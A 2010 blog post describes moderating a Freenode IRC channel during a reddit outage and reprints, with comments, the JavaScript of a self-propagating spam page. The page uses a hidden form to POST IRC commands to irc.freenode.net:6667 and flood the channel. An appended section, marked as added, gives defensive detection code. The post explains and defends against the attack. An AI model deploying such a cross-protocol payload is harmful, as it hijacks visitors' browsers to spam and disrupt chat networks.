Using a browser to piss off IRC users, or, spamming #redditdowntime

27 Jan 2010
Posted by R. Tyler Ballance

One of my most favorite sites on the internet, reddit, took some downtime this evening while doing some infrastructure (both hardware and software) upgrades. On their down-page, the reddit team invited everybody to join the #redditdowntime channel on the Freenode network, ostensibly to help users pass the time waiting for their pics and IAMAs to come back online.

Shortly after reddit started their scheduled outage, I joined the channel to pass the time while I debated what I should do with my evening. Within minutes the channel was flooded with a number of users, varying between spouting reddit memes in caps, link-spamming, or engaging in casual chit-chat. I complained to one of the ops and fairly well-known-to-redditors employee, jedberg, about the lack of moderation and he nearly instantly gave me +o (ops) in the channel. Not one to take my ops duty lightly, I started kicking spammers, warning habitual caps-lock users and tried to keep things generally civil through the deluge of messages consuming the channel.

Towards the end of the scheduled outage, some automated link-spamming started to appear, and once it started it triggered more and more link-spamming. Clearly whatever was behind the bit.ly link was responsible for the self-propagating nature of the spamming. While the other moderators and I tried to keep up with banning people, I used wget to fetch the destination of the clearly malicious bit.ly URL to determine what we were dealing with. What I found is one of the more clever bits of JavaScript I think I've seen in recent months.

After bringing the site back up for a few minutes, reddit had to take it back down after noticing some problems with the upgrade, so another flood of users filled into the #redditdowntime channel and the link-spamming got worse. The most interesting aspect of the JavaScript in the code snippet below is how simple it is. I've commented it up a bit to help explain what's actually going on:

    <iframe id="y" name="y" style="display:none"></iframe>

    <form method="post" target="y" action="http://irc.freenode.net:6667/" enctype="text/plain" id="f" style="display:none">
    <textarea name="x" id="x"></textarea>
    </form>

    <script type="text/javascript">
    /*
     * Generate a random string of characters to use for an IRC nick
     */
    function rnd(){
        var chars="abcdefghijklmnopqrstuvwxyz";
        var r='';
        var length=Math.floor(Math.random()*10+3);
        for (var i=0;i<length;i++){
            var rnum=Math.floor(Math.random() * chars.length);
            r += chars.substring(rnum, rnum+1);
        }
        return r;
    }
    function lol(){
        /* Grab a reference to the textarea */
        var x = document.getElementById('x');
        /* Grab a reference to the form itself */
        var f = document.getElementById('f');
        /* Generate a fake user-name */
        var i = rnd();
        /* Generate a fake nick */
        var n = rnd();

        /*
         * Build a series of IRC commands into a string:
         * - Set the username
         * - Set the nick
         * - Join the channel to spam (#redditdowntime)
         * - Queue up a bunch of PRIVMSG commands to the channel with the spam link
         */
        x.value='\r\nUSER '+i+' 8 * :'+n+'\r\nNICK '+n+'\r\nJOIN #redditdowntime\r\n'+new Array(99).join('PRIVMSG #redditdowntime :http://bit.ly/lolreddit\r\n')+'';

        /* Submit the form, effectively sending the textarea contents to an IRC server */
        f.submit();

        /* Setup a loop for maximum irritation */
        setTimeout(lol, 5000);
    }
    lol();
    </script>
    <h1>DIGG ROOLZ! REDDIT DROOLZ!</h1>
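
The server-side view of the snippet above, as an added example that is not part of the original post: the browser delivers the hidden form as an ordinary HTTP POST, so the IRC commands in the textarea arrive behind an HTTP request line and headers, and a listener can close the connection when it sees those before registration. The class and function names, the junk-line budget and both sample streams are assumptions made for illustration.

```javascript
// Added example, not from the original post; all names are hypothetical.
const HTTP_REQUEST_LINE = /^(GET|POST|PUT|HEAD|OPTIONS|DELETE|PATCH|CONNECT) \S+ HTTP\/\d\.\d$/;
const HTTP_HEADER = /^(Host|User-Agent|Content-Type|Content-Length|Origin|Referer|Cookie|Accept(-[A-Za-z]+)?):/i;
const REGISTRATION_COMMANDS = new Set(['PASS', 'NICK', 'USER', 'CAP']);
const MAX_UNKNOWN_LINES = 4; // assumed budget for junk before registration

class PreRegistrationGuard {
  constructor() {
    this.buffer = '';          // received data that is not yet a full line
    this.unknown = 0;
    this.verdict = 'pending';  // 'pending' | 'accept' | 'drop'
    this.reason = null;
  }
  // Feed data as it arrives; TCP may split a line across chunks.
  feed(chunk) {
    this.buffer += chunk;
    let end;
    while (this.verdict === 'pending' && (end = this.buffer.indexOf('\n')) !== -1) {
      const line = this.buffer.slice(0, end).replace(/\r$/, '');
      this.buffer = this.buffer.slice(end + 1);
      if (line !== '') this.inspect(line);  // empty lines are ignored
    }
    return this.verdict;
  }
  inspect(line) {
    if (HTTP_REQUEST_LINE.test(line) || HTTP_HEADER.test(line)) {
      // Close the socket: skipping only this line would let the form body through.
      return this.drop('http-request-on-irc-port');
    }
    const command = line.replace(/^:\S+ +/, '').split(' ')[0].toUpperCase();
    if (REGISTRATION_COMMANDS.has(command)) this.verdict = 'accept';
    else if (++this.unknown > MAX_UNKNOWN_LINES) this.drop('no-registration');
  }
  drop(reason) { this.verdict = 'drop'; this.reason = reason; }
}

// Constructed samples: roughly what a browser sends for the hidden form above
// (text/plain puts "x=" on its own line), and a normal IRC client registering.
const BROWSER_STREAM = ['POST / HTTP/1.1', 'Host: irc.freenode.net:6667',
  'Content-Type: text/plain', '', 'x=', 'USER abcde 8 * :fghij', 'NICK fghij',
  'JOIN #redditdowntime', 'PRIVMSG #redditdowntime :<link>', ''].join('\r\n');
const CLIENT_STREAM = 'NICK alice\r\nUSER alice 8 * :Alice\r\n';

function classify(stream, chunkSize = 7) {
  const guard = new PreRegistrationGuard();
  for (let i = 0; i < stream.length && guard.verdict === 'pending'; i += chunkSize) {
    guard.feed(stream.slice(i, i + chunkSize));
  }
  return { verdict: guard.verdict, reason: guard.reason };
}
```

The verdict is a signal to close the connection, not to discard a single line, because the `USER`, `NICK`, `JOIN` and `PRIVMSG` lines follow the headers on the same stream.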